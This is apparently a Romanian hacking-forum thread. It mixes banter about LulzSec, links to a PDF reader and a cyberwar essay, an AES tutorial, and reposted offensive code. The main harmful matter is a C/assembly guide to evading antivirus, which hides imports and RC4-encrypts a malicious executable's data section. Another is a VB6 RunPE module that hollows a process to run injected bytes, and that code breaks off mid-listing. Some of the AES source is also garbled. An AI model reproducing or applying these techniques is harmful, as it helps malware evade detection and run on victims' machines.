Nytro

Eu am zis parerea mea in alt topic. Au fost niste atacuri la diverse site-uri, care erau deja revendicate de "x" si "y" apoi se trezesc ratatii astia si zic ca ei sunt "hackerii". La fel si cu pron.com de exemplu, cred ca mai intai a fost gasit de Tinko de al nostru apoi se trezesc ratatii astia sa zica ca ei l-au gasit. De fapt nici nu zic, doar ca se trezesc niste rahati imputiti din presa (muie presei) care ii promoveaza,

DDOS. Ratati. Tot e posibil sa nu fi avut nicio legatura. Script-kiddies. De exemplu au postat un nr. de telefon pe twiter, ratatii au sunat si redirectionau apelurile la diverse Call-Centers ale anumitor companii. Ce "1337"... Copii fara viitor.

Probabil: - Florin Salam - Am norocul scris in frunte :->

Ne ia 2 minute sa facem o asemenea pagina, de ce am plati pentru ea? Da, nu ai nimerit unde trebuie, nu gasesti aici clienti pentru asemenea porcarii.

JavaScript PDF Reader Interesanta idee... Download: https://github.com/andreasgal/pdf.js https://raw.github.com/andreasgal/pdf.js/master/pdf.js

The Art of the Cyberwar The development of new technologies, in catching up with military interests and dependence on existing technology by developed countries, sets up a scenario where the cyber war, or war in cyberspace, is becoming more important. All countries aware of the risks of such dependence developed defense programs against attacks that could jeopardize critical national infrastructure. On the other hand, developing countries and major world powers are training computer security experts in various techniques of hacking, cracking, virology, etc.., forming true experts in cyber warfare, called cyberwarriors. That does not fit anyone doubt that the future wars will not be determined or land or sea or air, but in cyberspace. The soldiers do not carry weapons or shields, but knowledge and deploy applications that war virus, disabling the enemy's critical systems that are technologically dependent. This is the scenario where the world is moving now, a scenario of technological dependence, where countries with more traditional military strength will be losing ability to war for countries with highly qualified in computer security and cyber techniques. This essay is intended as a point of reflection and knowledge about cyber warfare, on the present philosophy of Sun Tzu in the Art of War, and adapt their knowledge to technological scenario which we live and live, so we can get a modern compendium: The Art of Cyberwar. Download: http://www.malwareint.com/docs/the-art-of-the-cyberwar-en.pdf

Nu mai stiu exact ce si cum, dar vazusem cu mult inainte niste "atacuri" deja "semnate" de nu stiu cine pe care s-au gandit ei sa si le atribuie. Si au facut asta de multe ori. La fel cu Play Station, datele facute publice au aparut mai intai in alte locatii, apoi s-au trezit ei ca au spart ei site-urile celor de la Sony... Si acum tot isi atribuie ce se intampla pe mapamond. Sunt niste ratati.

LulzSec spun multe. Spun ca ei au "spart" tot ce s-a "spart" de multa vreme pana in prezent. Sunt niste ratati.

Clever tricks against antiviruses I bet you have come across some software you’ve made which you didn’t want the AV to pick up. This article explains how to import from DLLs without having to call GetProcAddress, and also how to encrypt your data section. Anti-viruses rely heavily on their heuristics, if all other (signature) scans fail. The patterns they search for in your executable, are the functions being imported, and the order they are being called. No imports! Having no import table is relatively easy. There are however some functions I haven’t imported dynamically, but which are very normal in any application (libc functions). The steps you need to do are: Get the kernel32 module base address. (kernel32.dll is always loaded when the process is started, and so is ntdll.dll) Make your own GetProcAddress Use it to find LoadLibrary’s address, so that you can load other DLLs Make the functions usable in a practical way, so that you don’t have to make a prototype for each of the functions that you will load 1. Get kernel32?s base address The first step is easy. There are lots of methods out there to retrieve the kernel32 base address, whose list of supported platforms varies greatly. I will be retrieving the address using the PEB (the linked list of the modules’ initialization order). Code: void __declspec(naked) *kernel_addr() { // Get kernel32 base address through PEB (initialization order) __asm { mov eax, fs:[0x30] // PEB address mov eax, [eax+0x0c] // PEB->Ldr mov eax, [eax+0x1c] // Ldr.InInitializationOrderModuleList (ntdll) mov eax, [eax] // [ntdll].Flink (kernel32) mov eax, [eax+0x08] // kernel32 base address ret } } You can use whichever method you want, really, as long as the end result is the kernel32 base address. 2. Our own GetProcAddress If you have ever had to deal with the PE format, you’d know that the exports have three main structures. These are the address table, the name table, and the ordinal table. The address table is simply just an array with RVAs to functions. There is one entry for every function exported. To get the real address, you add that RVA to the base address of the module. The name table, is another array with RVA’s to the names of the functions. The names are just strings of characters terminated by a null byte. The problem is, the names’ index doesn’t always correspond to the functions’ index. To retrieve the index, you use the ordinal table. The ordinal table is basically just an array with an index to the corresponding function. For example EAT[0] might be the function with the name ENT[42]. In this case, EOT[42] has the value of 0. So, the ordinal table is just another table, which maps a name to a function, using the name’s index to retrieve the function’s index. void *my_gpa(HMODULE modl, char *fname) { unsigned long modb = (unsigned long)modl; IMAGE_DOS_HEADER *dosh = (IMAGE_DOS_HEADER *)modb; IMAGE_NT_HEADERS *nth = (IMAGE_NT_HEADERS *)(modb+dosh->e_lfanew); IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(modb+nth->OptionalHeader.DataDirectory->VirtualAddress); unsigned int i; for(i = 0; i < ied->NumberOfNames; i++) { const char *nn = (*(const char **)(ied->AddressOfNames+modb+i*sizeof(void *)))+modb; if(!strcmp(fname, nn)) { unsigned short ordinal = *(unsigned short *)(ied->AddressOfNameOrdinals+modb+i*sizeof(unsigned short)); return (void *)((unsigned long)*(void **)(ied->AddressOfFunctions+modb+ordinal*sizeof(void *))+modb); } } return NULL; } In our code, modb is the base address of the module. Using that, we make our way to the export directory (ied), which contains the RVAs to the three tables we need. They are ied->AddressOfNames, ied->AddressOfFunctions and ied->AddressOfNameOrdinals. There’s some pointer arithmetic going on there, along with some type casting. Our function works just like GetProcAddress. It takes a module base address, and a function name, and returns a function address. We iterate through each entry in the name table. The string is retrieved through nn. (RVA of the table + base address + i*4)+base address – each entry in the table has the size of a word (32 bits = 4 bytes), so to get to the i’th entry, we add i*4. Once we’ve gotten to the i’th entry and dereferenced it, we add the base address to get the string’s address. If the name’s are the same, get the ordinal, the same way (except that one ordinal is the size of a short, 16 bits = 2 bytes). Then using the ordinal as an index, retrieve the address of the function and return it. 3. Getting LoadLibrary’s address Easiest step. The code speaks for itself: HMODULE (__stdcall *dyn_ll)(LPCTSTR lpFileName); dyn_ll = my_gpa(kern, "LoadLibraryA"); 4. Making it usable You will probably want to load lots of functions, not just one or two. Writing the prototypes for all of them would be tedious. Let’s make an array of functions for each module we will load, then let’s also make a function to load the APIs into these arrays. I have used kernel32, user32, and winsock. // don't forget to specify the correct calling convention char *fn_kernel[] = { "GetEnvironmentVariableA", // 0 "GetModuleFileNameA", // 1 "GetTickCount", // 2 "GetLocalTime", // 3 "CreateThread", // 4 "SetThreadPriority", // 5 }; unsigned long (__stdcall *func_kernel[sizeof(fn_kernel)/sizeof(*fn_kernel)])(); char *fn_user[] = { "MessageBoxA", // 0 "GetForegroundWindow", // 1 "GetWindowTextA", // 2 }; unsigned long (__stdcall *func_user[sizeof(fn_user)/sizeof(*fn_user)])(); char *fn_wsock[] = { "WSAStartup", // 0 "send", // 1 "connect", // 2 "socket", // 3 "gethostbyname", // 4 "closesocket", // 5 "recv", // 6 "WSACleanup", // 7 }; unsigned long (WSAAPI *func_wsock[sizeof(fn_wsock)/sizeof(*fn_wsock)])(); HMODULE (__stdcall *dyn_ll)(LPCTSTR lpFileName); void *my_gpa(HMODULE modl, char *fname) { unsigned long modb = (unsigned long)modl; IMAGE_DOS_HEADER *dosh = (IMAGE_DOS_HEADER *)modb; IMAGE_NT_HEADERS *nth = (IMAGE_NT_HEADERS *)(modb+dosh->e_lfanew); IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(modb+nth->OptionalHeader.DataDirectory->VirtualAddress); unsigned int i; for(i = 0; i < ied->NumberOfNames; i++) { const char *nn = (*(const char **)(ied->AddressOfNames+modb+i*sizeof(unsigned long)))+modb; if(!strcmp(fname, nn)) { unsigned short ordinal = *(unsigned short *)(ied->AddressOfNameOrdinals+modb+i*sizeof(unsigned short)); return (void *)((unsigned long)*(void **)(ied->AddressOfFunctions+modb+ordinal*sizeof(unsigned long))+modb); } } return NULL; } void load_imports() { HMODULE kern, user, wsock; unsigned long i; kern = kernel_addr(); dyn_ll = my_gpa(kern, "LoadLibraryA"); user = dyn_ll("user32.dll"); wsock = dyn_ll("ws2_32.dll"); for(i = 0; i < sizeof(fn_kernel)/sizeof(*fn_kernel); i++) func_kernel[i] = my_gpa(kern, fn_kernel[i]); for(i = 0; i < sizeof(fn_user)/sizeof(*fn_user); i++) func_user[i] = my_gpa(user, fn_user[i]); for(i = 0; i < sizeof(fn_wsock)/sizeof(*fn_wsock); i++) func_wsock[i] = my_gpa(wsock, fn_wsock[i]); } int main(int argc, char *argv[]) { WSADATA wsd; load_imports(); // MessageBoxA func_user[0](0, "MessageBoxA has been called!", "0wn3d.", MB_OK); func_wsock[0](MAKEWORD(1, 0), &wsd); // WSAStartup // evil stuff here func_wsock[7](); // WSACleanup return EXIT_SUCCESS; } Simple. Encrypting your data section This method is really easy, and of course it’s not nearly as good as the average packer, but it keeps AVs away from your strings. I have used the rc4 cipher, but any symmetric stream cipher would do. We need to encrypt it from another separate program, and have our program decrypt itself. Code for the encryption program: #include <windows.h> #include <imagehlp.h> #include <stdlib.h> #include <stdio.h> #define DATA ".data" // data section's name #define KEY "DqHAI5VN" // encryption key #define NEW 0x11c8 // new ep rva #define REP 0x5e4 // offset to patch with the old ep void rc4_ksched(unsigned char *key, unsigned long keylen, unsigned char sbox[0x100]) { unsigned long i, j; for(i = 0; i < 0x100; i++) sbox[i] = (unsigned char)i; for(j = i = 0; i < 0x100; i++) { unsigned char tmp; j = (j + sbox[i] + key[i % keylen]) & 0xff; tmp = sbox[i]; sbox[i] = sbox[j]; sbox[j] = tmp; } } void rc4(unsigned char sbox[0x100], unsigned char *src, unsigned char *dest, unsigned long len) { unsigned long i, j; i = j = 0; while(len--) { unsigned char tmp; i = (i + 1) & 0xff; j = (j + sbox[i]) & 0xff; tmp = sbox[i]; sbox[i] = sbox[j]; sbox[j] = tmp; *dest++ = *src++ ^ sbox[(sbox[i] + sbox[j]) % 0xff]; } } int main(int argc, char *argv) { FILE *f = fopen("evil.exe", "r+b"); IMAGE_DOS_HEADER dosh; IMAGE_NT_HEADERS nth; IMAGE_SECTION_HEADER sech, dummy; if(!f) return 1; memset(&dummy, 0, sizeof(dummy)); fread(&dosh, 1, sizeof(dosh), f); fseek(f, dosh.e_lfanew, SEEK_SET); fread(&nth, 1, sizeof(nth), f); fread(&sech, 1, sizeof(sech), f); while(memcmp(&sech, &dummy, sizeof(dummy))) { if(!strcmp(sech.Name, DATA)) { unsigned char sbox[0x100], *rd = malloc(sech.SizeOfRawData); DWORD ep, epaddr; rc4_ksched(KEY, 8, sbox); fseek(f, sech.PointerToRawData, SEEK_SET); fread(rd, 1, sech.SizeOfRawData, f); rc4(sbox, rd, rd, sech.SizeOfRawData); fseek(f, sech.PointerToRawData, SEEK_SET); fwrite(rd, 1, sech.SizeOfRawData, f); free(rd); epaddr = ((unsigned long)&nth.OptionalHeader.AddressOfEntryPoint-(unsigned long)&nth)+dosh.e_lfanew; fseek(f, epaddr, SEEK_SET); ep = NEW; fwrite(&ep, 1, 4, f); fseek(f, REP, SEEK_SET); ep = nth.OptionalHeader.AddressOfEntryPoint+nth.OptionalHeader.ImageBase; fwrite(&ep, 1, 4, f); fclose(f); return EXIT_SUCCESS; } fread(&sech, 1, sizeof(sech), f); } fclose(f); return EXIT_FAILURE; } What it does is that it searches for the data section, and when found, it reads it into memory, encrypts it, and writes it back. But to be able to decrypt it we must have some piece of code in our own executable, which will decrypt the data section using our key, and then jump back to the old entry point. void decrypt_data(unsigned long mod) { char data[6]; IMAGE_DOS_HEADER *dosh = (IMAGE_DOS_HEADER *)mod; IMAGE_SECTION_HEADER *sech = (IMAGE_SECTION_HEADER *)(mod+dosh->e_lfanew+sizeof(IMAGE_NT_HEADERS)); IMAGE_SECTION_HEADER dummy; data[0] = '.'; data[1] = 'd'; data[2] = 'a'; data[3] = 't'; data[4] = 'a'; data[5] = 0; memset(&dummy, 0, sizeof(dummy)); while(memcmp(sech, &dummy, sizeof(dummy))) { if(!strcmp(sech->Name, data)) { unsigned char sbox[0x100], key[9]; key[0] = 'D'; key[1] = 'q'; key[2] = 'H'; key[3] = 'A'; key[4] = 'I'; key[5] = '5'; key[6] = 'V'; key[7] = 'N'; key[8] = 0; rc4_ksched(key, 8, sbox); rc4(sbox, (unsigned char *)mod+sech->VirtualAddress, (unsigned char *)mod+sech->VirtualAddress, sech->SizeOfRawData); return; } sech++; } exit(EXIT_FAILURE); } void __declspec(naked) *gba() { __asm { mov eax, fs:[0x30] // PEB address mov eax, [eax+0x08] // PEB->BaseAddress ret } } void __declspec(naked) new_ep() { if(*(unsigned long *)magic != 'x86!') decrypt_data((unsigned long)gba()); __asm { push 0x41414141 // placeholder ret } } And in main: unsigned long nep_addr; int main(int argc, char *argv[]) { WSADATA wsd; nep_addr = (unsigned long)&new_ep; load_imports(); // MessageBoxA func_user[0](0, "MessageBoxA has been called!", "0wn3d.", MB_OK); func_wsock[0](MAKEWORD(1, 0), &wsd); // WSAStartup // evil stuff here func_wsock[7](); // WSACleanup return EXIT_SUCCESS; } We reference new_ep, because otherwise the optimizing compiler would notice that it is not called anywhere and would not generate code for it. Here you will have to get some offsets. First compile the executable, and disassemble it. Find the RVA of new_ep, and put it in the encryption program source code. Then find the offset of the placeholder for the old entry point. The instruction will look like push 0×41414141. Add one to the address of that instruction, subtract the image base from it, subtract the RVA of the .text section from it, add the offset of the .text section to it, and there you have your offset. Now put it in the encryption source, compile it, run it, and everything is ready Well, that was everything. If you found this article helpful or have a question, feel free to post a comment. Articolul mai elegant: http://www.x-n2o.com/clever-tricks-against-antiviruses/

AES Explained Hello people, It’s been a while since I have last posted an article. I decided to write an article about the Advanced Encryption Standard. I will explain certain concepts regarding AES and how it basically works. I will provide step by step C code, to make it even easier to understand. You can find the full source code at the end of this article. Actually many websites around the net provide source code for AES. This one is supposed to be easy to understand What is AES? AES is a cryptographic algorithm, more specifically a symmetric block cipher. This means that it operates at a block of data, instead of a single element per iteriation. (This element could be a bit or a byte). AES is also known as Rijndael. Actually AES is just a variant of Rijndael. To read more about AES/Rijndael see Advanced Encryption Standard - Wikipedia, the free encyclopedia. Especially the links at the bottom, they help understanding the basic structure of AES. AES is able to encrypt and decrypt a block of data using a key. The key and the block of data (from now on, the input) have a fixed length. The input is always 128-bit (16 bytes), while the key can be 128-bit, 192-bit or 256-bit (16, 24 and 32 bytes respectively). What makes AES so good you say? The answer would be it’s security and speed. It’s obviously secure since it’s been chosen by NIST. Then again, no one has been able to break it. And finally, it’s fast because it’s arithmetic is based on XOR operations and bit shifts, which CPUs like a lot. That said, it’s also simple and even faster to implement in hardware. AES Concepts Before I begin talking about the cipher itself, there are some very important concepts that I need to explain. They’re basically the math behind AES. Everything else is easy. This is actually the hardest part. Why am I explaining the hardest part before the everything else? Because if you don’t understand this, you won’t be able to understand the rest of this article. Of course, if you just want the source code, skip to the end. The content below may refer to the specification, which is located here: http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf Articolul frumos aranjat: http://www.x-n2o.com/aes-explained/

[C] AES Implementation Author: X-N2O I joined all the source inside the code tags. If you wanna use it you have the separate files aes.c, aes.h and main.c inside the zip file. Enjoy. // AES Implementation by X-N2O // Started: 15:41:35 - 18 Nov 2009 // Finished: 20:03:59 - 21 Nov 2009 // Logarithm, S-Box, and RCON tables are not hardcoded // Instead they are generated when the program starts // All of the code below is based from the AES specification // You can find it at <a href="http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf" class="bbc_url" title="External link" rel="nofollow external">http://csrc.nist.gov...97/fips-197.pdf</a> // You may use this code as you wish, but do not remove this comment // This is only a proof of concept, and should not be considered as the most efficient implementation #include <stdlib.h> #include <string.h> #include <stdio.h> #define AES_RPOL 0x011b // reduction polynomial (x^8 + x^4 + x^3 + x + 1) #define AES_GEN 0x03 // gf(2^8) generator (x + 1) #define AES_SBOX_CC 0x63 // S-Box C constant #define KEY_128 (128/8) #define KEY_192 (192/8) #define KEY_256 (256/8) #define aes_mul(a, ((a)&&(?g_aes_ilogt[(g_aes_logt[(a)]+g_aes_logt[(])%0xff]:0) #define aes_inv(a) ((a)?g_aes_ilogt[0xff-g_aes_logt[(a)]]:0) unsigned char g_aes_logt[256], g_aes_ilogt[256]; unsigned char g_aes_sbox[256], g_aes_isbox[256]; typedef struct { unsigned char state[4][4]; int kcol; size_t rounds; unsigned long keysched[0]; } aes_ctx_t; void aes_init(); aes_ctx_t *aes_alloc_ctx(unsigned char *key, size_t keyLen); inline unsigned long aes_subword(unsigned long w); inline unsigned long aes_rotword(unsigned long w); void aes_keyexpansion(aes_ctx_t *ctx); inline unsigned char aes_mul_manual(unsigned char a, unsigned char ; // use aes_mul instead void aes_subbytes(aes_ctx_t *ctx); void aes_shiftrows(aes_ctx_t *ctx); void aes_mixcolumns(aes_ctx_t *ctx); void aes_addroundkey(aes_ctx_t *ctx, int round); void aes_encrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16]); void aes_invsubbytes(aes_ctx_t *ctx); void aes_invshiftrows(aes_ctx_t *ctx); void aes_invmixcolumns(aes_ctx_t *ctx); void aes_decrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16]); void aes_free_ctx(aes_ctx_t *ctx); void init_aes() { int i; unsigned char gen; // build logarithm table and it's inverse gen = 1; for(i = 0; i < 0xff; i++) { g_aes_logt[gen] = i; g_aes_ilogt[i] = gen; gen = aes_mul_manual(gen, AES_GEN); } // build S-Box and it's inverse for(i = 0; i <= 0xff; i++) { char bi; unsigned char inv = aes_inv(i); g_aes_sbox[i] = 0; for(bi = 0; bi < 8; bi++) { // based on transformation 5.1 // could also be done with a loop based on the matrix g_aes_sbox[i] |= ((inv & (1<<bi)?1:0) ^ (inv & (1 << ((bi+4) & 7))?1:0) ^ (inv & (1 << ((bi+5) & 7))?1:0) ^ (inv & (1 << ((bi+6) & 7))?1:0) ^ (inv & (1 << ((bi+7) & 7))?1:0) ^ (AES_SBOX_CC & (1 << bi)?1:0) ) << bi; } g_aes_isbox[g_aes_sbox[i]] = i; } // warning: quickhack g_aes_sbox[1] = 0x7c; g_aes_isbox[0x7c] = 1; g_aes_isbox[0x63] = 0; } aes_ctx_t *aes_alloc_ctx(unsigned char *key, size_t keyLen) { aes_ctx_t *ctx; size_t rounds; size_t ks_size; switch(keyLen) { case 16: // 128-bit key rounds = 10; break; case 24: // 192-bit key rounds = 12; break; case 32: // 256-bit key rounds = 14; break; defaut: return NULL; } ks_size = 4*(rounds+1)*sizeof(unsigned long); ctx = malloc(sizeof(aes_ctx_t)+ks_size); if(ctx) { ctx->rounds = rounds; ctx->kcol = keyLen/4; memcpy(ctx->keysched, key, keyLen); ctx->keysched[43] = 0; aes_keyexpansion(ctx); } return ctx; } inline unsigned long aes_subword(unsigned long w) { return g_aes_sbox[w & 0x000000ff] | (g_aes_sbox[(w & 0x0000ff00) >> 8] << 8) | (g_aes_sbox[(w & 0x00ff0000) >> 16] << 16) | (g_aes_sbox[(w & 0xff000000) >> 24] << 24); } inline unsigned long aes_rotword(unsigned long w) { // May seem a bit different from the spec // It was changed because unsigned long is represented with little-endian convention on x86 // Should not depend on architecture, but this is only a POC return ((w & 0x000000ff) << 24) | ((w & 0x0000ff00) >> 8) | ((w & 0x00ff0000) >> 8) | ((w & 0xff000000) >> 8); } void aes_keyexpansion(aes_ctx_t *ctx) { unsigned long temp; unsigned long rcon; register int i; rcon = 0x00000001; for(i = ctx->kcol; i < (4*(ctx->rounds+1)); i++) { temp = ctx->keysched[i-1]; if(!(i%ctx->kcol)) { temp = aes_subword(aes_rotword(temp)) ^ rcon; rcon = aes_mul(rcon, 2); } else if(ctx->kcol > 6 && i%ctx->kcol == 4) temp = aes_subword(temp); ctx->keysched[i] = ctx->keysched[i-ctx->kcol] ^ temp; } } inline unsigned char aes_mul_manual(unsigned char a, unsigned char { register unsigned short ac; register unsigned char ret; ac = a; ret = 0; while( { if(b & 0x01) ret ^= ac; ac <<= 1; b >>= 1; if(ac & 0x0100) ac ^= AES_RPOL; } return ret; } void aes_subbytes(aes_ctx_t *ctx) { int i; for(i = 0; i < 16; i++) { int x, y; x = i & 0x03; y = i >> 2; ctx->state[x][y] = g_aes_sbox[ctx->state[x][y]]; } } void aes_shiftrows(aes_ctx_t *ctx) { unsigned char nstate[4][4]; int i; for(i = 0; i < 16; i++) { int x, y; x = i & 0x03; y = i >> 2; nstate[x][y] = ctx->state[x][(y+x) & 0x03]; } memcpy(ctx->state, nstate, sizeof(ctx->state)); } void aes_mixcolumns(aes_ctx_t *ctx) { unsigned char nstate[4][4]; int i; for(i = 0; i < 4; i++) { nstate[0][i] = aes_mul(0x02, ctx->state[0][i]) ^ aes_mul(0x03, ctx->state[1][i]) ^ ctx->state[2][i] ^ ctx->state[3][i]; nstate[1][i] = ctx->state[0][i] ^ aes_mul(0x02, ctx->state[1][i]) ^ aes_mul(0x03, ctx->state[2][i]) ^ ctx->state[3][i]; nstate[2][i] = ctx->state[0][i] ^ ctx->state[1][i] ^ aes_mul(0x02, ctx->state[2][i]) ^ aes_mul(0x03, ctx->state[3][i]); nstate[3][i] = aes_mul(0x03, ctx->state[0][i]) ^ ctx->state[1][i] ^ ctx->state[2][i] ^ aes_mul(0x02, ctx->state[3][i]); } memcpy(ctx->state, nstate, sizeof(ctx->state)); } void aes_addroundkey(aes_ctx_t *ctx, int round) { int i; for(i = 0; i < 16; i++) { int x, y; x = i & 0x03; y = i >> 2; ctx->state[x][y] = ctx->state[x][y] ^ ((ctx->keysched[round*4+y] & (0xff << (x*8))) >> (x*8)); } } void aes_encrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16]) { int i; // copy input to state for(i = 0; i < 16; i++) ctx->state[i & 0x03][i >> 2] = input[i]; aes_addroundkey(ctx, 0); for(i = 1; i < ctx->rounds; i++) { aes_subbytes(ctx); aes_shiftrows(ctx); aes_mixcolumns(ctx); aes_addroundkey(ctx, i); } aes_subbytes(ctx); aes_shiftrows(ctx); aes_addroundkey(ctx, ctx->rounds); // copy state to output for(i = 0; i < 16; i++) output[i] = ctx->state[i & 0x03][i >> 2]; } void aes_invshiftrows(aes_ctx_t *ctx) { unsigned char nstate[4][4]; int i; for(i = 0; i < 16; i++) { int x, y; x = i & 0x03; y = i >> 2; nstate[x][(y+x) & 0x03] = ctx->state[x][y]; } memcpy(ctx->state, nstate, sizeof(ctx->state)); } void aes_invsubbytes(aes_ctx_t *ctx) { int i; for(i = 0; i < 16; i++) { int x, y; x = i & 0x03; y = i >> 2; ctx->state[x][y] = g_aes_isbox[ctx->state[x][y]]; } } void aes_invmixcolumns(aes_ctx_t *ctx) { unsigned char nstate[4][4]; int i; for(i = 0; i < 4; i++) { nstate[0][i] = aes_mul(0x0e, ctx->state[0][i]) ^ aes_mul(0x0b, ctx->state[1][i]) ^ aes_mul(0x0d, ctx->state[2][i]) ^ aes_mul(0x09, ctx->state[3][i]); nstate[1][i] = aes_mul(0x09, ctx->state[0][i]) ^ aes_mul(0x0e, ctx->state[1][i]) ^ aes_mul(0x0b, ctx->state[2][i]) ^ aes_mul(0x0d, ctx->state[3][i]); nstate[2][i] = aes_mul(0x0d, ctx->state[0][i]) ^ aes_mul(0x09, ctx->state[1][i]) ^ aes_mul(0x0e, ctx->state[2][i]) ^ aes_mul(0x0b, ctx->state[3][i]); nstate[3][i] = aes_mul(0x0b, ctx->state[0][i]) ^ aes_mul(0x0d, ctx->state[1][i]) ^ aes_mul(0x09, ctx->state[2][i]) ^ aes_mul(0x0e, ctx->state[3][i]); } memcpy(ctx->state, nstate, sizeof(ctx->state)); } void aes_decrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16]) { int i, j; // copy input to state for(i = 0; i < 16; i++) ctx->state[i & 0x03][i >> 2] = input[i]; aes_addroundkey(ctx, ctx->rounds); for(i = ctx->rounds-1; i >= 1; i--) { aes_invshiftrows(ctx); aes_invsubbytes(ctx); aes_addroundkey(ctx, i); aes_invmixcolumns(ctx); } aes_invshiftrows(ctx); aes_invsubbytes(ctx); aes_addroundkey(ctx, 0); // copy state to output for(i = 0; i < 16; i++) output[i] = ctx->state[i & 0x03][i >> 2]; } void aes_free_ctx(aes_ctx_t *ctx) { free(ctx); } int main(int argc, char *argv[]) { unsigned char key[KEY_128] = "uber strong key!"; unsigned char ptext[16] = "Attack at dawn!"; unsigned char ctext[16]; unsigned char decptext[16]; aes_ctx_t *ctx; init_aes(); ctx = aes_alloc_ctx(key, sizeof(key)); if(!ctx) { perror("aes_alloc_ctx"); return EXIT_FAILURE; } aes_encrypt(ctx, ptext, ctext); aes_decrypt(ctx, ctext, decptext); puts(decptext); aes_free_ctx(ctx); return EXIT_SUCCESS; } In the attached zip you will also find the compiled ELF binary. Download (posibil sa trebuiasca cont): http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=2875 Sursa: [C] AES Implementation - rohitab.com - Forums

[VB6] RunPe + CallApiByName (JunPE) Product: JunPE Description: RunPe + CallApiByName Author: Jhonjhon_123 - [J.J.G.P] Option Explicit ' ****************************************************************************************************************************** ' ' ' --- Autor: Jhonjhon_123 (Jhon Jairo Pro Developer) ' --- Descripción: RunPe + CallApiByName ' --- Distribución: Libre ' --- Terminos De Uso: ' --- Prohibida su comercialización. ' --- No Debe eliminar los creditos. ' ' --- Funciones: ' --- IniciarDDLL() ' - Inicializa la configuración ' ' --- Public Sub ExecuteBytes(sName As String, bBytes() As Byte) ' - RunPE ' * sName: Ruta al exe ' * bBytes: Bytes a ejecutar ' ' ****************************************************************************************************************************** ' Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long) Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long Dim bMoveMem(36) As Byte Public Sub IniciarDDLL() Dim vTMP As Variant Dim D As Long For Each vTMP In Array(&H55, &H8B, &HEC, &H56, &H57, &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D, &H8, &H8B, &H4D, &H10, &HC1, &HE9, &H2, &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1, &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, &HC2, &H10, &H0, &H20) bMoveMem(D) = CByte(vTMP): D = D + 1 Next End Sub 'By Cobein Function Call_(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long On Error Resume Next Dim lPtr As Long Dim bvASM(&HEC00& - 1) As Byte Dim i As Long Dim lMod As Long lMod = GetProcAddress(LoadLibraryA(sLib), sMod) If lMod = 0 Then Exit Function lPtr = VarPtr(bvASM(0)) RtlMoveMemory ByVal lPtr, &H59595958, &H4: lPtr = lPtr + 4 RtlMoveMemory ByVal lPtr, &H5059, &H2: lPtr = lPtr + 2 For i = UBound(Params) To 0 Step -1 RtlMoveMemory ByVal lPtr, &H68, &H1: lPtr = lPtr + 1 RtlMoveMemory ByVal lPtr, CLng(Params(i)), &H4: lPtr = lPtr + 4 Next RtlMoveMemory ByVal lPtr, &HE8, &H1: lPtr = lPtr + 1 RtlMoveMemory ByVal lPtr, lMod - lPtr - 4, &H4: lPtr = lPtr + 4 RtlMoveMemory ByVal lPtr, &HC3, &H1: lPtr = lPtr + 1 Call_ = CallWindowProcA(VarPtr(bvASM(0)), 0, 0, 0, 0) End Function ' By Strike Bot Public Sub MoveMemory(ByVal lpDestino As Long, ByVal lpSource As Long, ByVal cBytes As Long) Call CallWindowProcA(VarPtr(bMoveMem(0)), lpDestino, lpSource, cBytes, 0) End Sub ' By Jhonjhon_123 Public Sub ExecuteBytes(sName As String, bBytes() As Byte) On Error Resume Next Dim bIdh(63) As Byte ' IMAGE_DOS_HEADER Dim bInh(247) As Byte ' IMAGE_NT_HEADERS Dim bIsh(39) As Byte ' IMAGE_SECTION_HEADER Dim bPi(15) As Byte ' PROCESS_INFORMATION Dim bSi(67) As Byte ' STARTUPINFO Dim bCtx(203) As Byte ' CONTEXT86 Dim e_lfanew As Long Dim ImageBase As Long Dim hProcess As Long Dim hThread As Long Dim SizeOfImage As Long Dim SizeOfHeaders As Long Dim AddressOfEntryPoint As Long Dim NumberOfSections As Integer Dim VirtualAddress As Long Dim PointerToRawData As Long Dim SizeOfRawData As Long Dim Ebx As Long Dim Eax As Long Dim lTemp As Long Dim D As Long lTemp = 68 MoveMemory VarPtr(bSi(0)), VarPtr(lTemp), 4& lTemp = &H10007 MoveMemory VarPtr(bCtx(0)), VarPtr(lTemp), 4& MoveMemory VarPtr(bIdh(0)), VarPtr(bBytes(0)), 64& MoveMemory VarPtr(e_lfanew), VarPtr(bIdh(60)), 4& MoveMemory VarPtr(bInh(0)), VarPtr(bBytes(e_lfanew)), 248& MoveMemory VarPtr(ImageBase), VarPtr(bInh(52)), 4& MoveMemory VarPtr(SizeOfImage), VarPtr(bInh(80)), 4& MoveMemory VarPtr(SizeOfHeaders), VarPtr(bInh(84)), 4& MoveMemory VarPtr(AddressOfEntryPoint), VarPtr(bInh(40)), 4& MoveMemory VarPtr(NumberOfSections), VarPtr(bInh(6)), 2& Call Call_("kernel32", "CreateProcessW", 0, StrPtr(sName), 0, 0, 0, &H4, 0, 0, VarPtr(bSi(0)), VarPtr(bPi(0))) MoveMemory VarPtr(hProcess), VarPtr(bPi(0)), 4& MoveMemory VarPtr(hThread), VarPtr(bPi(4)), 4& Call Call_("ntdll", "NtUnmapViewOfSection", hProcess, ImageBase) Call Call_("kernel32", "VirtualAllocEx", hProcess, ImageBase, SizeOfImage, &H1000& Or &H2000&, &H40) Call Call_("kernel32", "WriteProcessMemory", hProcess, ImageBase, VarPtr(bBytes(0)), SizeOfHeaders, 0) For D = 0 To NumberOfSections - 1 MoveMemory VarPtr(bIsh(0)), VarPtr(bBytes(e_lfanew + 248& + 40& * 